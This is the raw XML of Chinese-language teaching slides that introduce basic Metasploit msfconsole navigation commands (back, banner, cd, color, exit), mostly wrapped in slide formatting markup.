              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5206365" y="464820"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.在msfconsole控制台中输入“back”命令，可以返回上一级。4.输入“banner”命令可以打印欢迎横幅，如图2-4-9所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5206365" y="1663700"/>
            <a:ext cx="5276850" cy="4667250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5206365" y="6330950"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-9  Metasploit欢迎横幅</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit基本命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4718050" y="2025015"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“cd”命令与Linux 操作系统中的“cd”命令的使用方法和功能是一样的，都用于切换工作路径。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>color”命令用于开启或关闭关键字标红的功能，输入“color false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令后界面中的关键字符不再标红显示，当输入“color true”命令后，标注再次启用。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>7.“exit”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令用于退出msfconsole命令行，返回操作系统的命令行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit基本命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
